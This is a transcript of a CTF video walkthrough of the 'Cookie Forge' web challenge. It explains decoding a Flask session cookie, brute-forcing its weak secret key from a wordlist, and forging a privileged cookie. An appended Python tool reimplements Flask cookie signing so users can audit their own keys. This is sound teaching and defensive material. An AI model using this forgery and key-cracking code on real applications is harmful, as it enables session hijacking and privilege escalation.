How's it going, everybody? My name is John Hammond. I wanted to use this video to showcase one of the challenges from the HackPack CTF that was on just recently. I want to showcase the Cookie Forge challenge, which was a web challenge, and when I had solved it originally it was kind of one of the harder ones that had a much higher point value and not as many solves. But now here we are: dynamic points and dynamic scoring, so this has been down to 100 points, and it's been solved by more than a few people. So I want to showcase this because I thought it was kind of cool. It is: "Help a new local cookie bakery start-up shake down their new online ordering and loyalty reward points at this location." It says, "I wonder if they'll sell you a flask of milk to go with your cookies." So, going to access this web page, it looks like we have Cookie Forge, "the place to go for hand-forged, fire-baked, pancreas-devastating sugar cookies every single time," so you could go ahead and order now, and you need to go ahead and log in with something. So I'll say "please subscribe" and whatever password. It says you've been logged in as this account, so we go order a cookie. It says "Cookie Forge warnings on the oven: there's no pinching." Okay. Safety... that page seems to be filled with some boilerplate text and nothing particularly interesting. I don't know how well you can see that California one, but it's... it's a little cheesy and funny. Okay, the flagship loyalty one says, "You aren't a flagship loyalty member. No cookies for you." So if I go to take a look at my cookies (I'm using the Cookie-Editor plug-in on Google Chrome), I can see I do have a cookie here that's set for a session, and when I first looked at this I was like, wow, that looks like a JWT or a JSON web token. You could go to jwt.io to kind of take a look at this, just spit it in here, and it'll try and debug it for you or decompress it, but it errors out.
It says that's an invalid signature. I don't know why I can't speak right now, but the invalid signature tells me that, okay, that doesn't seem to be a JWT token. With that, I was kind of thinking, okay, well, maybe this is a Flask session cookie that's set in the Flask micro framework that Python typically uses. I've seen this sort of thing before, and I know that that is a technique, that is an avenue and a route for attack, where you can forge a Flask session cookie. So I tried to do some research. I looked around on this on the Googles, on the interwebs, on the stuff. There are a lot of really, really cool articles and things you can read about this, and I see some options here. This is even discussed in picoCTF, in one of their old 2018 challenges; they do showcase this technique in the Flask Cards challenge, and here's a Flask decode. So this page is really, really cool, where they break it down into how you can go ahead and abuse this, and they even showcase how the cookies are really put together: the session data, the timestamp, and a cryptographic hash. This is all kind of built in with specific things, and actually, when we were in jwt.io, it was able to go ahead and determine, just by base64-decoding that first part, it says flagship equals false and our username is whatever we supplied. So it doesn't matter what username we log in with; there's no admin, there's no mod or whatever. Flagship is really the value that we particularly care about, and it seems like we have to go ahead and set that to true, when it says, "You aren't a flagship loyalty member. No cookies for you." We need to set that to true.
So we are a flagship loyalty member. So what I had gone ahead and done was I started to kind of look through all this code and how we could abuse it. When I was looking through some of the write-ups that were referring to doing this attack, or forging a session or session cookie, it turns out you always need, or you typically need (I haven't found a route where you don't), you need the secret key of the application or of the server. So that's a little tough. I hadn't found any techniques where I would be able to leak that out. Typically, if we were to try and clear this session, if there were some avenue or aspect in the web page that would allow us to do some template injection or some, like, session template injection, we might be able to, okay, get like the config value out, if we were reading that with Jinja, if they were actually being parsed, and we were able to return out all the values that config would return for us, or do some math with, like, seven plus seven, verify that that template injection actually works. We could potentially leak out the secret key. I never saw that happen. I couldn't find an injection point to actually leak out the secret key. So I was like, well, what the heck do we do? If we need the secret key, what do we do? Do we just guess it? Do we just brute force it? When I asked about this... and I think even the rules say, hey, don't brute force any of the challenges. And I asked the Discord server, is it necessary to brute force any of this stuff? I think the answer was no. I never seemed to get something other than that, but anyway, this is kind of the technique and the route that I went down on. I'll start to just fire this up in a script so we can really see what I'm talking about. I have a script.py down here. We can go ahead and create it, and I'll clear out some of my stuff from the other videos I've been trying to put out. So let's go ahead and create a Python script.
I will import requests, and I'll have our URL, which should be just this guy for the web page. I'll try and go ahead and log in with a session that we can create. So let me kill that cookie again and get back to our login page. So when we go ahead and submit something to this login, I'll open up my network tab so I can see, okay, what are the real values that are passed through? I'll say username and password. That gets me to log in. Seeing this, if I go view what is actually passed in here within the headers or within the parameters, etc., etc., we are sending in username and password set there, and maybe that would allow us to actually go ahead and grab a session cookie. So let me do that in our Python script. I'll go ahead and create a session; I'll say that's a requests.Session. And I'll try and log in when I say s.post to our URL, and they were going to the login endpoint. Is that login.php? Nope, just regular login. So our data can go ahead and equal: username can be anything, password can also be anything. And let's just store that as a variable so I can actually see what it returns for us. Let's go ahead and print out that r value. It looks like it returned successfully. So let's go grab the text, and it says, okay, you've been logged in as the user that we've supplied. So now I should be able to go ahead and actually access what my session cookies are. If I go take a look at that session dot... I have a cookie jar here. I want to go ahead and access the session value, and that is what I have as my actual session. So let's just say that can be a variable for us. Let's just call that a session cookie, I suppose. Now we're going to have a proof of concept getting a regular, default, crafted session cookie, but we need to go ahead and forge it again.
We need to know the secret key of this application that's written in Flask. I wasn't able to track anything down with that. What I had done to brute force for the longest time is I ended up doing things like creating a simple manual word list out of some of the words that are on the page, between okay, oven, pinching, cookie, forge, and I had no idea how it would actually look, like sugar, California. Is there going to be capital letters? Is there going to be random leet speak? Is there going to be nonsense? I just couldn't figure it out. I used CeWL for the time being to go ahead and actually grab some potential words that would be used in each of the pages. It would spit out a good few of them, but even using that to brute force just wouldn't work. And CeWL, if you don't know, is a good utility to make a custom word list from a web page, but it didn't work. So anyway, let me show you this procedure. What I had ended up doing was using some of the code where we could encode or decode a specific Flask session cookie. I ended up finding that on GitHub. noraj had a really, really good one; I think he's from RawSec. I think, yeah, yeah, yeah, they have some excellent stuff from that CTF team. So using this in Python 2 or Python 3... Sublime is currently set up to use Python 2, so I think I'll stick with that. Hopefully no one gets angry at me. But they give you this tool where you can go ahead, from the command line, and encode or decode session cookies based on a specific payload, given a string or a type or a cookie structure, etc., etc. But you always need the secret key. So here's what I ended up doing.
I'll go ahead and steal some of the code from this guy here, grabbing the itsdangerous module and their base64 code, because that's what Flask actually uses to go ahead and create and work through these sessions and create these session cookies. So let me just kind of steal this standard input stuff that he uses. I'll slap that in my little script, and we don't need to worry about argparse, but we do probably want to be able to determine session cookie stuff. So he ended up creating a little MockApp class, and ended up creating a Flask session cookie manager here, and he would use some methods, encode or decode, that would use some of the values that were pulled out of these libraries here. Let me go ahead and just rip these encode and decode functions so we have them and can see if they are in fact what we're going to end up working with. Let me turn the text size down here so I can make sense of what's going on. This decode function, we'll just kind of verify. This would use one other argument for a class, but because we're not going to use that in a class, we won't bother with it. It looks like it does need that MockApp object, so I'll just go ahead and steal that guy, slap him in, and it'll create something from ast, which we should be able to load. Let me just see if this still works. Yep, okay. So no session issues for me. You might need to go ahead and install Flask to get this to work: pip install, pip2, pip3, whatever you end up using. But with that, we should be able to go ahead and encode a specific string. Let me just do a simple proof of concept to verify that that would work. So let's print what we're using our encode function for, and we can say dummy secret key and our session cookie structure. So that's probably going to be expected as a string, and that's why you can determine, oh, they're using a literal_eval. So they're actually taking a string of a dictionary object.
So I'll just say anything can be set to anything. Run this, and it looks like it will actually go ahead and cook that cookie for us. So we know that encode function works. Now, let's go ahead and decode a cookie. Really, we don't need to do that, because we've already kind of got our decode functionality, or all we care about is forging this cookie, right? So we need to go ahead and build our own payload as to what we want our session cookie to look like on the real website, and we need to figure out the secret key. What I'm going to do is I'm going to end up brute forcing that secret key. Again, I used CeWL earlier to try and figure it out. Um, that never worked for me, so I ended up trying it with rockyou, and that actually had some success. So let me show you what I do. Let's go ahead and grab sort of a payload that we want to use, or our own session. Uh, jwt.io should still have this guy here for us, which is the structure that we want, and let's make this all on one line so it will behave. I'll set that to true, and our username can still be "please sub"; that's totally fine. Let's go ahead and determine what the secret key might be. Let's just try a dummy one and see if we can get the website to do anything strange. So I'll encode again a new cookie; make that dummy secret key, which will fail, and our payload. And then if we go ahead and access the flagship loyalty page... if I take a look at the network tab, if I go... well, I access that, it looks like it tries to access flag. So that might be a resource or location that we can just kind of hammer and test with our secret key, to determine if it's going to give the flag to us. So the flag format for the CTF is just flag curly brace. So what we could do is we could take our URL, and now that we've made a new cookie, we can go ahead and try and access that page.
So I'll use requests.get, URL plus flag, and I'll include our cookie, now as a new cookie, with my session new cookie in there. Let's set that as a variable so we can go ahead and see what it returns for us, r.text, and that seems to display nothing in our case. So maybe we know we have the secret key that's wrong, but we can go ahead and try to brute force now with some potential ones. So what I'm going to end up doing is I'm actually just going to open up rockyou. So, with open, opt rockyou.txt... trying to see my keyboard with the microphone in the way. Uh, it's still bad that I look at my keyboard, but whatever. Let's do handle.readlines, and then I know there's going to be some newline characters in that, so I'll do l.strip for l in handle.readlines. So now I have an array, or a whole list of lines. So for secret_key in lines, we can go ahead and specify our new cookie and request the page with that, and we'll go ahead and verify. We can test if that flag format prefix is in r.text, because if it is, we could say, oh, hey, we got the flag, and we'll go ahead and print out that r.text so we could see it, we could find it. I'll break there, and what I'll do is I'll go ahead and actually print out "Trying secret key", and we'll format in our secret key. And we should be sure to use that in the encode function, so it actually works there for us. So let's fire this up. I'm going to run this script now. It'll take a little bit to start, because it has to read in the entire rockyou file, but then it's going to go ahead and try and hammer the service with these. So we can go ahead and keep trying secret keys, and eventually we find one with password1. So if I go check it out up here, it's trying the secret key password1, and it got the flag. It was able to see that flag prefix in the output, and it says, "Oh my aching pancreas, these are delicious." Great. So that's it.
That was the flag you could submit for however many points it was worth at that time, because, you know, very annoying, it has dynamic scoring. I honestly hate dynamic scoring, but hey, you didn't ask me. So, uh, that's that. That's the technique. All I really did was go ahead and grab all of those Flask dependencies, necessities, the boilerplate stuff that it needs, and then create a simple app that will allow you to work with a secret key, and then I just kind of stole the code from noraj, because, hey, I know that will go ahead and create a simple cookie for me without even having the whole infrastructure of Flask behind it. I could forge it and create it with the payload that I needed, and determining the secret key allows me to inject it into that same application and get the flag out of that. So I used rockyou to brute force; CeWL didn't work for me, I tried my own manual word list, didn't work for me. That was the technique that I had used. So holy cow, thank you guys so much for watching. Uh, I hope you guys enjoyed; if you did, I'd love to see you guys hit that like button, type a little comment, say something nice or mean, I don't care, whatever brings in the engagement, YouTube algorithm stuff. So please subscribe. It'd be fantastic to see you guys. I'd love to see you on the Discord server; there's a link in the description, super smart people in there, much smarter than me. And, uh, see you on Patreon, PayPal, Discord, LinkedIn, Facebook, Twitter, Instagram, all of the social media things. Thanks, everybody. I'll see you later.
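The video relies on two properties of Flask session cookies that it never spells out in code: the payload is only base64-encoded (anyone can read `flagship: false`), and the only thing stopping a forged `flagship: true` is the HMAC signature, whose strength is exactly the strength of the app's SECRET_KEY. The block below is an added, standard-library-only reimplementation of the scheme Flask applies through itsdangerous (JSON payload, optional zlib compression marked by a leading `.`, a timestamp, and HMAC-SHA1 under a key derived as HMAC(SECRET_KEY, "cookie-session")); it is not John Hammond's script, noraj's tool, or the library itself, and it assumes that reading of the format is accurate. The sample session, the weak key `password1` from the video, and the short list of common keys are constructed here so the audit runs offline; the point of `audit_secret_key` is to check your own deployed key against a wordlist before an attacker does, and `demo` shows that a key from `secrets.token_hex` never turns up in one.

```python
"""Flask-style session cookies: readable by anyone, forgeable by whoever knows SECRET_KEY.

Stand-alone re-creation (assumed to mirror itsdangerous' URLSafeTimedSerializer as
Flask configures it). Use it to audit the secret key of an app you operate.
"""
import base64
import hashlib
import hmac
import json
import secrets
import time
import zlib
from typing import Iterable, Optional

SALT = b"cookie-session"  # the salt Flask's session interface hands to itsdangerous


def _b64e(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")


def _b64d(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def _derived_key(secret_key: str) -> bytes:
    # key_derivation="hmac": signing key = HMAC-SHA1(secret_key, salt)
    return hmac.new(secret_key.encode(), SALT, hashlib.sha1).digest()


def encode_session(secret_key: str, data: dict, timestamp: Optional[int] = None) -> str:
    """Build a signed cookie the way the server does: payload.timestamp.signature."""
    payload = json.dumps(data, separators=(",", ":"), sort_keys=True).encode()
    compressed = zlib.compress(payload)
    if len(compressed) < len(payload) - 1:
        body = "." + _b64e(compressed)  # leading '.' flags a compressed payload
    else:
        body = _b64e(payload)
    ts = int(time.time()) if timestamp is None else timestamp
    ts_part = _b64e(ts.to_bytes((ts.bit_length() + 7) // 8 or 1, "big"))
    signed_value = f"{body}.{ts_part}".encode()
    sig = hmac.new(_derived_key(secret_key), signed_value, hashlib.sha1).digest()
    return f"{body}.{ts_part}.{_b64e(sig)}"


def decode_payload(cookie: str) -> dict:
    """Read the session contents with no key at all: encoded, not encrypted."""
    body, _ts, _sig = cookie.rsplit(".", 2)
    raw = zlib.decompress(_b64d(body[1:])) if body.startswith(".") else _b64d(body)
    return json.loads(raw)


def verify_cookie(cookie: str, secret_key: str) -> bool:
    """Server-side check: does the signature match under this SECRET_KEY?"""
    try:
        body, ts_part, sig = cookie.rsplit(".", 2)
        expected = hmac.new(_derived_key(secret_key), f"{body}.{ts_part}".encode(), hashlib.sha1).digest()
        return hmac.compare_digest(expected, _b64d(sig))
    except ValueError:  # malformed cookie or bad base64
        return False


def audit_secret_key(cookie: str, candidate_keys: Iterable[str]) -> Optional[str]:
    """Defender's check: is the key that signed this cookie a common/weak value?"""
    for key in candidate_keys:
        if verify_cookie(cookie, key):
            return key
    return None


# Constructed sample data: a session shaped like the challenge's, the weak key the
# video's run found, and a tiny stand-in for a wordlist such as rockyou.txt.
WEAK_KEY = "password1"
SAMPLE_SESSION = {"flagship": False, "username": "please subscribe"}
COMMON_KEYS = ["123456", "secret", "changeme", "password1", "letmein"]


def demo() -> dict:
    cookie = encode_session(WEAK_KEY, SAMPLE_SESSION, timestamp=1_600_000_000)
    found = audit_secret_key(cookie, COMMON_KEYS)
    # With the key recovered, a cookie claiming flagship=True verifies just like a real one.
    forged = encode_session(found, {**SAMPLE_SESSION, "flagship": True}) if found else None
    strong_cookie = encode_session(secrets.token_hex(32), SAMPLE_SESSION)
    return {
        "readable_without_key": decode_payload(cookie),
        "weak_key_found": found,
        "forged_cookie_accepted": forged is not None and verify_cookie(forged, WEAK_KEY),
        "strong_key_in_list": audit_secret_key(strong_cookie, COMMON_KEYS),
    }


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

Run it against a cookie copied from your own app (with your real wordlist in place of `COMMON_KEYS`); a hit means the session secret needs rotating to a random value of at least 32 bytes, which is the one change that makes the forgery in the video impossible regardless of what the payload contains.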